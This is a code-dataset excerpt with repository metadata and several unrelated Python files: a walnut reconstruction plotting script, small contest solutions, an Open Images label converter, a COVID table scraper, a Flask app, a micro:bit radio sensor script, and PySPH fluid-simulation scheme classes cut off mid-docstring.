seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
12078215414 | import os
import yaml
import argparse
import torch
import matplotlib.pyplot as plt
from omegaconf import OmegaConf
from bayes_dip.data.datasets.walnut import get_walnut_2d_inner_part_defined_by_patch_size
from bayes_dip.utils.evaluation_utils import get_abs_diff, get_ground_truth, get_stddev, translate_path
from bayes_dip.utils.plot_utils import configure_matplotlib, plot_image, add_inset
parser = argparse.ArgumentParser()
parser.add_argument('--runs_file', type=str, default='runs_walnut_sample_based_density.yaml', help='path of yaml file containing hydra output directory names')
parser.add_argument('--experiments_outputs_path', type=str, default='../experiments/outputs', help='base path containing the hydra output directories (usually "[...]/outputs/")')
parser.add_argument('--experiments_multirun_path', type=str, default='../experiments/multirun', help='base path containing the hydra multirun directories (usually "[...]/multirun/")')
parser.add_argument('--do_not_use_predcp', action='store_true', default=False, help='use the run without PredCP (i.e., use MLL instead of TV-MAP)')
parser.add_argument('--include_outer_part', action='store_true', default=False, help='include the outer part of the walnut image (that only contains background)')
parser.add_argument('--define_inner_part_by_patch_size', type=int, default=1, help='patch size defining the effective inner part (due to not necessarily aligned patches)')
parser.add_argument('--do_not_subtract_image_noise_correction', action='store_true', default=False, help='do not subtract the image noise correction term (if any) from the covariance diagonals')
parser.add_argument('--save_data_to', type=str, default='', help='path to cache the plot data, such that they can be loaded with --load_data_from')
parser.add_argument('--load_data_from', type=str, default='', help='load data cached from a previous run with --save_data_to')
args = parser.parse_args()
experiment_paths = {
'outputs_path': args.experiments_outputs_path,
'multirun_path': args.experiments_multirun_path,
}
with open(args.runs_file, 'r') as f:
runs = yaml.safe_load(f)
def collect_walnut_mini_figure_data(args, runs):
data = {}
dip_mll_optim_run = OmegaConf.load(os.path.join(
translate_path(runs['include_predcp_False'], experiment_paths=experiment_paths),
'.hydra', 'config.yaml')
).inference.load_path
kwargs = {
'sample_idx': 0,
'experiment_paths': experiment_paths,
}
stddev_kwargs = {
'patch_idx_list': None if args.include_outer_part else 'walnut_inner',
'subtract_image_noise_correction_if_any': not args.do_not_subtract_image_noise_correction,
}
data['ground_truth'] = get_ground_truth(dip_mll_optim_run, **kwargs)
print('collecting bayes_dip data')
data['abs_diff'] = get_abs_diff(dip_mll_optim_run, **kwargs)
data['stddev'] = get_stddev(
runs[f'include_predcp_{not args.do_not_use_predcp}'], **kwargs, **stddev_kwargs)
data['mask'] = torch.logical_not(torch.isnan(data['stddev']))
print(f'Using {data["mask"].sum()} pixels.')
slice_0, slice_1 = (
(slice(0, data['ground_truth'].shape[0]), slice(0, data['ground_truth'].shape[1]))
if args.include_outer_part else
get_walnut_2d_inner_part_defined_by_patch_size(args.define_inner_part_by_patch_size))
assert data['mask'].sum() == (slice_0.stop - slice_0.start) * (slice_1.stop - slice_1.start)
data['slice_0'], data['slice_1'] = slice_0, slice_1
return data
if args.load_data_from:
print(f'loading data from {args.load_data_from}')
data = torch.load(args.load_data_from)
else:
data = collect_walnut_mini_figure_data(args, runs)
if args.save_data_to:
print(f'saving data to {args.save_data_to}')
torch.save(data, args.save_data_to)
configure_matplotlib()
fig, ax = plt.subplots(figsize=(4.5, 2.25), gridspec_kw={'left': 0., 'right': 0.5})
ground_truth = data['ground_truth']
abs_diff = data['abs_diff']
# nan parts black
stddev = data['stddev'].clone()
stddev[torch.logical_not(data['mask'])] = 0.
slice_0, slice_1 = data['slice_0'], data['slice_1']
plot_image(fig, ax, ground_truth[slice_0, slice_1], vmin=0.)
rect = [240-slice_0.start, 230-slice_0.start, 52, 104]
ax_abs_error = add_inset(fig, ax, abs_diff[slice_0, slice_1], [1.01, 0.505, 0.99, 0.495], rect, vmin=None, vmax=None, interpolation='none', frame_color='#aa0000', frame_path=[[0., 1.], [0., 0.], [1., 0.], [1., 1.], [0., 1.]], clip_path_closing=[], mark_in_orig=True)
ax_std = add_inset(fig, ax, stddev[slice_0, slice_1], [1.01, 0., 0.99, 0.495], rect, vmin=None, vmax=None, interpolation='none', frame_color='#aa0000', frame_path=[[0., 1.], [0., 0.], [1., 0.], [1., 1.], [0., 1.]], clip_path_closing=[], mark_in_orig=False)
ax_abs_error_twin = ax_abs_error.twinx()
ax_std_twin = ax_std.twinx()
ax_abs_error_twin.set_xticks([])
ax_abs_error_twin.set_yticks([])
ax_std_twin.set_xticks([])
ax_std_twin.set_yticks([])
for spine in ax.spines.values():
spine.set_visible(False)
for spine in ax_abs_error_twin.spines.values():
spine.set_visible(False)
for spine in ax_std_twin.spines.values():
spine.set_visible(False)
ax.set_ylabel('original image', labelpad=2)
ax_abs_error_twin.set_ylabel('error', rotation=-90, labelpad=9)
ax_std_twin.set_ylabel('std-dev', rotation=-90, labelpad=9)
fig.savefig(f'walnut_mini_include_predcp_{not args.do_not_use_predcp}.pdf', bbox_inches='tight', pad_inches=0.)
fig.savefig(f'walnut_mini_include_predcp_{not args.do_not_use_predcp}.png', bbox_inches='tight', pad_inches=0., dpi=600)
| educating-dip/bayes_dip | evaluation/plot_walnut_mini.py | plot_walnut_mini.py | py | 5,646 | python | en | code | 2 | github-code | 90 |
17986940379 | n = int(input())
a = list(map(int, input().split()))
arr = [0] * 9
ans = [0] * 2
for i in a:
if i//400 < 8:
arr[i//400] = 1
else:
arr[8] += 1
left = sum(arr[:8])
right = arr[8]
ans[0] = left
if left == 0:
ans[0] = 1
ans[1] = left + right
print(*ans) | Aasthaengg/IBMdataset | Python_codes/p03695/s402829184.py | s402829184.py | py | 285 | python | en | code | 0 | github-code | 90 |
42425644094 | """
https://www.codechef.com/problems/GDTURN
"""
if __name__ == "__main__":
n = int(input())
dice = list(list(map(int, input().split())) for i in range(n))
for roll in dice:
sum = roll[0] + roll[1]
if sum > 6:
print("YES")
else:
print("NO")
| vijay2930/HackerrankAndLeetcode | com/codechef/GoodTurn.py | GoodTurn.py | py | 301 | python | en | code | 0 | github-code | 90 |
27335828252 | import time
import numpy as np
import pandas as pd
import csv
from collections import defaultdict
import json
import os
import xlrd
label_map_path = "D:\\open_images\\4metadata\\oidv6-class-descriptions.csv"
train_label_path = "D:\\open_images\\1human\\oidv6-train-annotations-human-imagelabels.csv"
# train_json_file = "D:\\open_images\\1human\\oidv6-train-annotations-human-imagelabels.json"
val_label_path = "D:\\open_images\\1human\\validation-annotations-human-imagelabels.csv"
# val_json_file = "D:\\open_images\\1human\\validation-annotations-human-imagelabels.json"
test_label_path = "D:\\open_images\\1human\\test-annotations-human-imagelabels.csv"
# test_json_file = "D:\\open_images\\1human\\test-annotations-human-imagelabels.json"
json_hierarchy_file = "D:\\open_images\\bbox_labels_600_hierarchy.json"
# get label_id_to_name dict
df = pd.read_csv(label_map_path)
label_ids = np.array(df['LabelName'])
label_names = np.array(df['DisplayName'])
label_id_to_name = dict()
for idx, (label_id, label_name) in enumerate(zip(label_ids, label_names)):
label_id_to_name[label_id] = label_name
print("got label map dict")
def convert_json_hierarchy(hierarchy):
if isinstance(hierarchy, dict):
for key, val in hierarchy.items():
if key == "LabelName":
if val in label_id_to_name:
label_name = label_id_to_name[val]
hierarchy[key] = label_name
elif isinstance(val, list):
hierarchy[key] = convert_json_hierarchy(val)
elif isinstance(hierarchy, list):
for idx, elem in enumerate(hierarchy):
hierarchy[idx] = convert_json_hierarchy(elem)
return hierarchy
# stat label hierarchy file
# json_hierarchy = json.load(open(json_hierarchy_file))
# json_hierarchy_name = convert_json_hierarchy(json_hierarchy)
# json.dump(json_hierarchy_name, open("D:\\open_images\\bbox_labels_600_hierarchy.name.json", "w"))
def convert_label_to_json(label_path, use_cls_map=None):
# convert cls gt labels from csv to json
print("[+] processing {}".format(label_path))
# get imgs_label dict
start_t = time.time()
df = pd.read_csv(label_path)
image_ids = np.array(df['ImageID'])
label_names = np.array(df['LabelName'])
confidences = np.array(df['Confidence']) > 0
valid_image_ids = image_ids[confidences]
valid_label_ids = label_names[confidences]
imgs_label = defaultdict(list)
if use_cls_map is not None:
imgs_cls = defaultdict(lambda : [0]*135)
wb = xlrd.open_workbook(use_cls_map)
names_sheet = wb.sheets()[1]
cls_list = names_sheet.col_values(2)
cls_list.insert(0, "any")
print("[+] loaded cls map list")
for idx, (image_id, label_id) in enumerate(zip(valid_image_ids, valid_label_ids)):
imgs_label[image_id].append( label_id_to_name[label_id] )
try:
mapped_cls_idx = cls_list.index(label_id)
imgs_cls[image_id][mapped_cls_idx] = 1
imgs_cls[image_id][0] = 1
except:
pass
del image_ids, label_names, confidences, valid_image_ids, valid_label_ids
print("got img label list, use time {}".format(time.time() - start_t))
json_file = os.path.splitext(label_path)[0] + ".json"
cls_json_file = os.path.splitext(label_path)[0] + "_cls.json"
json.dump(imgs_label, open(json_file, "w"))
json.dump(imgs_cls, open(cls_json_file, "w"))
del imgs_label, imgs_cls
print("saved")
start_t = time.time()
imgs_label = json.load(open(json_file))
print("reload img label list, use time {}".format(time.time() - start_t))
convert_label_to_json(test_label_path, use_cls_map="D:\\open_images\\1human\\test-annotations-human-imagelabels.csv.stat.xlsx")
convert_label_to_json(val_label_path, use_cls_map="D:\\open_images\\1human\\test-annotations-human-imagelabels.csv.stat.xlsx")
convert_label_to_json(train_label_path, use_cls_map="D:\\open_images\\1human\\test-annotations-human-imagelabels.csv.stat.xlsx")
print("done")
| litianqi715/demo_ml | experimental/on_open_images_v6/convert_train_label.py | convert_train_label.py | py | 4,059 | python | en | code | 0 | github-code | 90 |
71252908136 | from colorama import Fore, init
init(autoreset=True)
from pandas import read_html
from path import path
url = "https://www.nytimes.com/interactive/2021/world/india-covid-cases.html"
d = read_html(url)
d[1].iloc[:,[0,1,2,4,5]].to_csv(path+"csv/current_covid_cases_deaths_india.csv")
def table():
print(f"{Fore.CYAN}\nCoronavirus in India - The NewYork Times\n")
print(d[1].iloc[:,[0,1,2,4,5]])
if __name__ == "__main__":
table()
| SinghIsWriting/companion | covid_cases.py | covid_cases.py | py | 437 | python | en | code | 1 | github-code | 90 |
2019024979 | from flask import Flask, request, render_template
import pandas as pd
from models.model import preprocessing
from models.predict import predict_value
app = Flask(__name__)
@app.route('/', methods=["GET", "POST"])
def index():
return render_template("index.html")
@app.route('/predict', methods = ['GET', 'POST'])
def data():
if request.method == 'POST':
f = request.form['csvfile']
with open(f) as file:
test_data = pd.read_csv(file)
# preprocessing from the function imported from model
features_test = preprocessing(test_data)
# predicting the value from function imported from predict
pred_ = predict_value(features_test, test_data)
pred_table = pred_.to_html()
return pred_table
if __name__ == "__main__":
app.run(debug=True) | honey1414/predictionApp | app.py | app.py | py | 858 | python | en | code | 0 | github-code | 90 |
12041911258 | class SENSOR:
STATION=0
LIGHT=1
COMPASS=2
TEMPER=3
ROLL=4
PITCH=5
ACCX=6
ACCY=7
ACCZ=8
ROTX=9
ROTY=10
ROTZ=11
MAGX=12
MAGY=13
MAGZ=14
stationID = 0
basic.show_number(0)
stationACK = range(26).fill(0)
radio.set_group(79)
radio.set_transmit_power(7)
# CLIENT: SETUP DATA STRUCTURE
dataBuffer = bytearray(19)
dataBuffer.fill(0)
##### SETUP #####
def on_button_pressed_b():
global stationID
stationID = (stationID + 1) % 26
drawStationID()
input.on_button_pressed(Button.B, on_button_pressed_b)
##### SERVER #####
##### SEND SYNC REQ #####
def on_button_pressed_ab():
global stationID, stationACK
#ASKING FOR RE-SYNC. OLD RSSI VALUES IGNORED
if stationID == 0:
for i in range(1,26):
drawUpToNumber(i)
print ("asking for SYNC station "+str(i))
stationACK[i] = 0 # reset the last RSSI. This may change async during the loop below
for j in range(10):
if stationACK[i] == 0: #if station didn't reply yet keep sending
radio.send_value("SYNC", i)
basic.pause(10+randint(1,5)*7)
basic.clear_screen()
drawClientMap()
input.on_button_pressed(Button.AB, on_button_pressed_ab)
### SERVER: DUMP THE stationACKs
def on_button_pressed_a():
global stationACK
lack = 26
for i in range(1,lack):
if stationACK[i]!=0:
print("Station "+str(i)+" ACK: "+ str(Math.map(stationACK[i],1,255,-128,-42)))
basic.pause(100)
drawClientMap()
input.on_button_pressed(Button.A, on_button_pressed_a)
##### CLIENT/SERVER: ACCEPTING REQ #####
def on_received_value(name, value):
global stationID, stationACK, dataBuffer
if stationID == 0: #SERVER: accept the ACK command
if name == "ACK":
if value > 0 & value <= 25:
stationACK[value] = Math.map(getRSSI(),-128,-42,1,255)
print("station "+str(value)+" has RSSI: "+getRSSI()+" ("+stationACK[value]+")")
drawClientMap()
elif name=="SYNC": #CLIENT reply with ACK several times
tries = triesFromRSSI(getRSSI(),0.95,9) # MAXIMUM 9 TRIES
print("sending ACK "+str(tries)+" times")
if value == stationID: ### REPLY ONLY IF WE HAVE A MATCHING STATIONID
for i in range(tries): ### tries ARE CALC'd WITH 95% RELIABILITY TARGET
radio.send_value("ACK",stationID)
drawUpToNumber(tries-i)
basic.pause(randint(1, 10)*100)
basic.clear_screen()
drawStationID()
else:
if name[0:6]=="DATARQ": #CLIENT: SEND DATA ARRAY BACK TO SERVER
statID = int(name[6:])
if statID==stationID: #CLIENT: ARE WE THE STATION BEING ASKED?
tries = triesFromRSSI(getRSSI(), 0.95, 9)
print("sending DATA "+str(tries)+ " times")
dataBuffer[SENSOR.STATION] = stationID
dataBuffer[SENSOR.LIGHT]=input.light_level()
dataBuffer[SENSOR.TEMPER]=input.temperature()
dataBuffer[SENSOR.COMPASS]=Math.map(input.compass_heading(),0,359,0,255)
dataBuffer[SENSOR.PITCH]=Math.map(input.rotation(Rotation.PITCH),-180,180,0,255)
dataBuffer[SENSOR.ROLL]=Math.map(input.rotation(Rotation.ROLL),-180,180,0,255)
magx = Math.round(Math.constrain(input.magnetic_force(Dimension.X),-127,127))
dataBuffer[SENSOR.MAGX]=Math.map(magx,-127,127,0,255)
for i in range(tries):
radio.send_buffer(dataBuffer)
drawUpToNumber(tries-i-1) # SHOW HOW MANY TRIES ARE LEFT
basic.pause(randint(1,5)*100)
radio.on_received_value(on_received_value)
#SERVER: RECEIVED DATA ARRAY FROM CLIENT
def on_received_buffer(receivedBuffer):
print("Recv'd data from stat "+str(receivedBuffer[0]))
print("Light: "+str(receivedBuffer[SENSOR.LIGHT]))
print("Temp: "+str(receivedBuffer[SENSOR.TEMPER]))
print("Compass: "+str(Math.map(receivedBuffer[SENSOR.COMPASS],0,255,0,359)))
print("Pitch: "+str(Math.map(receivedBuffer[SENSOR.PITCH],0,255,-180,180)))
print("Roll: "+str(Math.map(receivedBuffer[SENSOR.ROLL],0,255,-180,180)))
radio.on_received_buffer(on_received_buffer)
#SERVER: ASKING A CLIENT FOR DATA ARRAY
def on_pin_pressed_p0():
global stationID
if stationID == 0:
# CALCULATE TRIES BASED ON PREVIOUS RSSI FROM THIS CLIENT
# THE STATIONACK ARRAY HOLDS THE LAST RSSI FROM THIS CLIENT
# WE'RE SCALING THE RSSI FROM -128dB TO -42dB TO 1-255 RANGE AND BACK
tries = triesFromRSSI(Math.map(stationACK[14],1,255,-128,-42),0.95,9)
print("asking for DATA "+ str(tries)+ " times")
for i in range(tries):
radio.send_value("DATARQ14", 0)
basic.pause(randint(1,5)*50)
drawSingleNumber(14,255*(tries%2))
basic.clear_screen()
input.on_pin_pressed(TouchPin.P0, on_pin_pressed_p0)
##### UTILITIES #####
##### SERVER: DRAW CLIENT MAP #####
def drawClientMap():
global stationACK
lack = 26
basic.clear_screen()
for i in range(1,lack):
if stationACK[i]==0:
drawSingleNumber(i,10)
else:
drawSingleNumber(i,255)
##### DRAW A NUMBER WITH LEDS #####
def drawUpToNumber(n: number):
basic.clear_screen()
if n>=0 & n<=25:
for i in range(n):
led.plot(i % 5, i // 5)
else:
basic.show_icon(IconNames.SAD)
def drawSingleNumber(n: number, intensity: number):
n=n-1
if n>=0 & n<=25:
led.plot_brightness(n % 5, n // 5 ,intensity)
else:
basic.show_icon(IconNames.SAD)
##### CLIENT/SERVER: DRAW STATIONID USING LEDS #####
def drawStationID():
global stationID
if stationID > 9:
drawUpToNumber(stationID)
else:
basic.show_number(stationID)
pass
def getRSSI():
return radio.received_packet(RadioPacketProperty.SIGNAL_STRENGTH)
def triesN(y,p):
return Math.ceil(Math.log(1-y)/Math.log(p))
def lossP(y,n):
return Math.pow((1-y),1/n)
def triesFromRSSI(rssi: float, y:float, maxtries: int):
rssi2 = rssi + 100
p = Math.min(1,5936.2673*rssi2**(-3.7231)) # this function may return a p > 1
# so we limit it to 1
if p==1:
t = maxtries
else:
t = Math.max(1,triesN(y,p)) #if tries fall below 1, at least 1 try
return t
#drawNumber(19)
#drawSingleNumber(1,255)
#drawSingleNumber(5,255)
#drawSingleNumber(21,255)
#drawSingleNumber(25,255)
#strt = "DATARQ14"
#print(strt[6:])
| tsiozos/test-remote-sensing-rssi-with-ack | main.py | main.py | py | 6,675 | python | en | code | 0 | github-code | 90 |
18356462833 | """Abstract class to define the API for an SPH scheme. The idea is that
one can define a scheme and thereafter one simply instantiates a suitable
scheme, gives it a bunch of particles and runs the application.
"""
class Scheme(object):
"""An API for an SPH scheme.
"""
def __init__(self, fluids, solids, dim):
"""
Parameters
----------
fluids: list
List of names of fluid particle arrays.
solids: list
List of names of solid particle arrays (or boundaries).
dim: int
Dimensionality of the problem.
"""
self.fluids = fluids
self.solids = solids
self.dim = dim
self.solver = None
self.attributes_changed()
# Public protocol ###################################################
def add_user_options(self, group):
pass
def attributes_changed(self):
"""Overload this to compute any properties that depend on others.
This is automatically called when configure is called.
"""
pass
def configure(self, **kw):
"""Configure the scheme with given parameters.
Overload this to do any scheme specific stuff.
"""
for k, v in kw.items():
if not hasattr(self, k):
msg = 'Parameter {param} not defined for {scheme}.'.format(
param=k, scheme=self.__class__.__name__
)
raise RuntimeError(msg)
setattr(self, k, v)
self.attributes_changed()
def consume_user_options(self, options):
pass
def configure_solver(self, kernel=None, integrator_cls=None,
extra_steppers=None, **kw):
"""Configure the solver to be generated.
Parameters
----------
kernel : Kernel instance.
Kernel to use, if none is passed a default one is used.
integrator_cls : pysph.sph.integrator.Integrator
Integrator class to use, use sensible default if none is
passed.
extra_steppers : dict
Additional integration stepper instances as a dict.
**kw : extra arguments
Any additional keyword args are passed to the solver instance.
"""
raise NotImplementedError()
def get_equations(self):
raise NotImplementedError()
def get_solver(self):
return self.solver
def setup_properties(self, particles, clean=True):
"""Setup the particle arrays so they have the right set of properties
for this scheme.
Parameters
----------
particles : list
List of particle arrays.
clean : bool
If True, removes any unnecessary properties.
"""
raise NotImplementedError()
# Private protocol ###################################################
def _ensure_properties(self, pa, desired_props, clean=True):
"""Given a particle array and a set of properties desired,
this removes unnecessary properties (if `clean=True`), and
adds the desired properties.
Parameters
----------
pa : ParticleArray
Desired particle array.
desired_props : sequence
Desired properties to have in the array, can be a list of strings
or dicts with stride info or both.
clean : bool
Remove undesirable properties.
"""
all_props = {}
for p in desired_props:
if isinstance(p, dict):
all_props.update({p['name']: p})
elif p not in all_props:
all_props.update({p: {'name': p}})
pa_props = set(pa.properties.keys())
if clean:
to_remove = pa_props - set(all_props.keys())
for prop in to_remove:
pa.remove_property(prop)
to_add = set(all_props.keys()) - pa_props
for prop in to_add:
pa.add_property(**all_props[prop])
def _smart_getattr(self, obj, var):
res = getattr(obj, var)
if res is None:
return getattr(self, var)
else:
return res
class SchemeChooser(Scheme):
def __init__(self, default, **schemes):
"""
Parameters
----------
default: str
Name of the default scheme to use.
**schemes: kwargs
The schemes to choose between.
"""
self.default = default
self.schemes = dict(schemes)
self.scheme = schemes[default]
def add_user_options(self, group):
for scheme in self.schemes.values():
scheme.add_user_options(group)
choices = list(self.schemes.keys())
group.add_argument(
"--scheme", action="store", dest="scheme",
default=self.default, choices=choices,
help="Specify scheme to use (one of %s)." % choices
)
def attributes_changed(self):
self.scheme.attributes_changed()
def configure(self, **kw):
self.scheme.configure(**kw)
def consume_user_options(self, options):
self.scheme = self.schemes[options.scheme]
self.scheme.consume_user_options(options)
def configure_solver(self, kernel=None, integrator_cls=None,
extra_steppers=None, **kw):
self.scheme.configure_solver(
kernel=kernel, integrator_cls=integrator_cls,
extra_steppers=extra_steppers, **kw
)
def get_equations(self):
return self.scheme.get_equations()
def get_solver(self):
return self.scheme.get_solver()
def setup_properties(self, particles, clean=True):
"""Setup the particle arrays so they have the right set of properties
for this scheme.
Parameters
----------
particles : list
List of particle arrays.
clean : bool
If True, removes any unnecessary properties.
"""
self.scheme.setup_properties(particles, clean)
############################################################################
def add_bool_argument(group, arg, dest, help, default):
group.add_argument(
'--%s' % arg, action="store_true", dest=dest, help=help
)
neg_help = 'Do not ' + help[0].lower() + help[1:]
group.add_argument(
'--no-%s' % arg, action="store_false", dest=dest, help=neg_help
)
group.set_defaults(**{dest: default})
class WCSPHScheme(Scheme):
def __init__(self, fluids, solids, dim, rho0, c0, h0, hdx, gamma=7.0,
gx=0.0, gy=0.0, gz=0.0, alpha=0.1, beta=0.0, delta=0.1,
nu=0.0, tensile_correction=False, hg_correction=False,
update_h=False, delta_sph=False, summation_density=False):
"""Parameters
----------
fluids: list
List of names of fluid particle arrays.
solids: list
List of names of solid particle arrays (or boundaries).
dim: int
Dimensionality of the problem.
rho0: float
Reference density.
c0: float
Reference speed of sound.
gamma: float
Gamma for the equation of state.
h0: float
Reference smoothing length.
hdx: float
Ratio of h/dx.
gx, gy, gz: float
Body force acceleration components.
alpha: float
Coefficient for artificial viscosity.
beta: float
Coefficient for artificial viscosity.
delta: float
Coefficient used to control the intensity of diffusion of density
nu: float
Real viscosity of the fluid, defaults to no viscosity.
tensile_correction: bool
Use tensile correction.
hg_correction: bool
Use the Hughes-Graham correction.
update_h: bool
Update the smoothing length as per Ferrari et al.
delta_sph: bool
Use the delta-SPH correction terms.
summation_density: bool
Use summation density instead of continuity.
References
----------
.. [Hughes2010] J. P. Hughes and D. I. Graham, "Comparison of
incompressible and weakly-compressible SPH models for free-surface
water flows", Journal of Hydraulic Research, 48 (2010), pp. 105-117.
.. [Marrone2011] S. Marrone et al., "delta-SPH model for simulating
violent impact flows", Computer Methods in Applied Mechanics and
Engineering, 200 (2011), pp 1526--1542.
.. [Cherfils2012] J. M. Cherfils et al., "JOSEPHINE: A parallel SPH
code for free-surface flows", Computer Physics Communications, 183
(2012), pp 1468--1480.
"""
self.fluids = fluids
self.solids = solids
self.solver = None
self.rho0 = rho0
self.c0 = c0
self.gamma = gamma
self.dim = dim
self.h0 = h0
self.hdx = hdx
self.gx = gx
self.gy = gy
self.gz = gz
self.alpha = alpha
self.beta = beta
self.delta = delta
self.nu = nu
self.tensile_correction = tensile_correction
self.hg_correction = hg_correction
self.update_h = update_h
self.delta_sph = delta_sph
self.summation_density = summation_density
def add_user_options(self, group):
group.add_argument(
"--alpha", action="store", type=float, dest="alpha",
default=None,
help="Alpha for the artificial viscosity."
)
group.add_argument(
"--beta", action="store", type=float, dest="beta",
default=None,
help="Beta for the artificial viscosity."
)
group.add_argument(
"--delta", action="store", type=float, dest="delta",
default=None,
help="Delta for the delta-SPH."
)
group.add_argument(
"--gamma", action="store", type=float, dest="gamma",
default=None,
help="Gamma for the state equation."
)
add_bool_argument(
group, 'tensile-correction', dest='tensile_correction',
help="Use tensile instability correction.",
default=None
)
add_bool_argument(
group, "hg-correction", dest="hg_correction",
help="Use the Hughes Graham correction.",
default=None
)
add_bool_argument(
group, "update-h", dest="update_h",
help="Update the smoothing length as per Ferrari et al.",
default=None
)
add_bool_argument(
group, "delta-sph", dest="delta_sph",
help="Use the delta-SPH correction terms.",
default=None
)
add_bool_argument(
group, "summation-density", dest="summation_density",
help="Use summation density instead of continuity.",
default=None
)
def consume_user_options(self, options):
vars = ['gamma', 'tensile_correction', 'hg_correction',
'update_h', 'delta_sph', 'alpha', 'beta',
'summation_density']
data = dict((var, self._smart_getattr(options, var))
for var in vars)
self.configure(**data)
def get_timestep(self, cfl=0.5):
return cfl*self.h0/self.c0
def configure_solver(self, kernel=None, integrator_cls=None,
extra_steppers=None, **kw):
from pysph.base.kernels import CubicSpline
if kernel is None:
kernel = CubicSpline(dim=self.dim)
steppers = {}
if extra_steppers is not None:
steppers.update(extra_steppers)
from pysph.sph.integrator import PECIntegrator, TVDRK3Integrator
from pysph.sph.integrator_step import WCSPHStep, WCSPHTVDRK3Step
cls = integrator_cls if integrator_cls is not None else PECIntegrator
step_cls = WCSPHTVDRK3Step if cls is TVDRK3Integrator else WCSPHStep
for name in self.fluids + self.solids:
if name not in steppers:
steppers[name] = step_cls()
integrator = cls(**steppers)
from pysph.solver.solver import Solver
if 'dt' not in kw:
kw['dt'] = self.get_timestep()
self.solver = Solver(
dim=self.dim, integrator=integrator, kernel=kernel, **kw
)
def get_equations(self):
from pysph.sph.equation import Group
from pysph.sph.wc.basic import (
MomentumEquation, TaitEOS, TaitEOSHGCorrection,
UpdateSmoothingLengthFerrari
)
from pysph.sph.wc.basic import (ContinuityEquationDeltaSPH,
ContinuityEquationDeltaSPHPreStep,
MomentumEquationDeltaSPH)
from pysph.sph.basic_equations import \
(ContinuityEquation, SummationDensity, XSPHCorrection)
from pysph.sph.wc.viscosity import (LaminarViscosity,
LaminarViscosityDeltaSPH)
from pysph.sph.wc.kernel_correction import (GradientCorrectionPreStep,
GradientCorrection)
equations = []
g1 = []
all = self.fluids + self.solids
if self.summation_density:
g0 = []
for name in self.fluids:
g0.append(SummationDensity(dest=name, sources=all))
equations.append(Group(equations=g0, real=False))
for name in self.fluids:
g1.append(TaitEOS(
dest=name, sources=None, rho0=self.rho0, c0=self.c0,
gamma=self.gamma
))
# This correction applies only to solids.
for name in self.solids:
if self.hg_correction:
g1.append(TaitEOSHGCorrection(
dest=name, sources=None, rho0=self.rho0, c0=self.c0,
gamma=self.gamma
))
else:
g1.append(TaitEOS(
dest=name, sources=None, rho0=self.rho0, c0=self.c0,
gamma=self.gamma
))
equations.append(Group(equations=g1, real=False))
if self.delta_sph and not self.summation_density:
eq2_pre = []
for name in self.fluids:
eq2_pre.append(
GradientCorrectionPreStep(dest=name, sources=[name],
dim=self.dim)
)
equations.append(Group(equations=eq2_pre, real=False))
eq2 = []
for name in self.fluids:
eq2.extend([
GradientCorrection(dest=name, sources=[name]),
ContinuityEquationDeltaSPHPreStep(
dest=name, sources=[name]
)])
equations.append(Group(equations=eq2))
g2 = []
for name in self.solids:
g2.append(ContinuityEquation(dest=name, sources=self.fluids))
for name in self.fluids:
if not self.summation_density:
g2.append(
ContinuityEquation(dest=name, sources=all)
)
if self.delta_sph and not self.summation_density:
g2.append(
ContinuityEquationDeltaSPH(
dest=name, sources=[name], c0=self.c0,
delta=self.delta
))
# This is required since MomentumEquation (ME) adds artificial
# viscosity (AV), so make alpha 0.0 for ME and enable delta sph AV.
alpha = 0.0 if self.delta_sph else self.alpha
g2.append(
MomentumEquation(
dest=name, sources=all, c0=self.c0,
alpha=alpha, beta=self.beta,
gx=self.gx, gy=self.gy, gz=self.gz,
tensile_correction=self.tensile_correction
))
if self.delta_sph:
g2.append(
MomentumEquationDeltaSPH(
dest=name, sources=[name], rho0=self.rho0, c0=self.c0,
alpha=self.alpha
))
g2.append(XSPHCorrection(dest=name, sources=[name]))
if abs(self.nu) > 1e-14:
if self.delta_sph:
eq = LaminarViscosityDeltaSPH(
dest=name, sources=all, dim=self.dim, rho0=self.rho0,
nu=self.nu
)
else:
eq = LaminarViscosity(
dest=name, sources=all, nu=self.nu
)
g2.insert(-1, eq)
equations.append(Group(equations=g2))
if self.update_h:
g3 = [
UpdateSmoothingLengthFerrari(
dest=x, sources=None, dim=self.dim, hdx=self.hdx
) for x in self.fluids
]
equations.append(Group(equations=g3, real=False))
return equations
def setup_properties(self, particles, clean=True):
from pysph.base.utils import get_particle_array_wcsph
dummy = get_particle_array_wcsph(name='junk')
props = list(dummy.properties.keys())
output_props = ['x', 'y', 'z', 'u', 'v', 'w', 'rho', 'm', 'h',
'pid', 'gid', 'tag', 'p']
if self.delta_sph:
delta_sph_props = [
{'name': 'm_mat', 'stride': 9},
{'name': 'gradrho', 'stride': 3},
]
props += delta_sph_props
for pa in particles:
self._ensure_properties(pa, props, clean)
pa.set_output_arrays(output_props)
if pa.name in self.solids:
# This is the load balancing weight for the solid particles.
# They do less work so we reduce the weight.
if 'lb_weight' not in pa.constants:
pa.add_constant('lb_weight', 0.1)
class TVFScheme(Scheme):
def __init__(self, fluids, solids, dim, rho0, c0, nu, p0, pb, h0,
gx=0.0, gy=0.0, gz=0.0, alpha=0.0, tdamp=0.0):
self.fluids = fluids
self.solids = solids
self.solver = None
self.rho0 = rho0
self.c0 = c0
self.pb = pb
self.p0 = p0
self.nu = nu
self.dim = dim
self.h0 = h0
self.gx = gx
self.gy = gy
self.gz = gz
self.alpha = alpha
self.tdamp = 0.0
def add_user_options(self, group):
group.add_argument(
"--alpha", action="store", type=float, dest="alpha",
default=None,
help="Alpha for the artificial viscosity."
)
group.add_argument(
"--tdamp", action="store", type=float, dest="tdamp",
default=None,
help="Time for which the accelerations are damped."
)
def consume_user_options(self, options):
vars = ['alpha', 'tdamp']
data = dict((var, self._smart_getattr(options, var))
for var in vars)
self.configure(**data)
def get_timestep(self, cfl=0.25):
dt_cfl = cfl * self.h0/self.c0
if self.nu > 1e-12:
dt_viscous = 0.125 * self.h0**2/self.nu
else:
dt_viscous = 1.0
dt_force = 1.0
return min(dt_cfl, dt_viscous, dt_force)
def configure_solver(self, kernel=None, integrator_cls=None,
extra_steppers=None, **kw):
"""Configure the solver to be generated.
Parameters
----------
kernel : Kernel instance.
Kernel to use, if none is passed a default one is used.
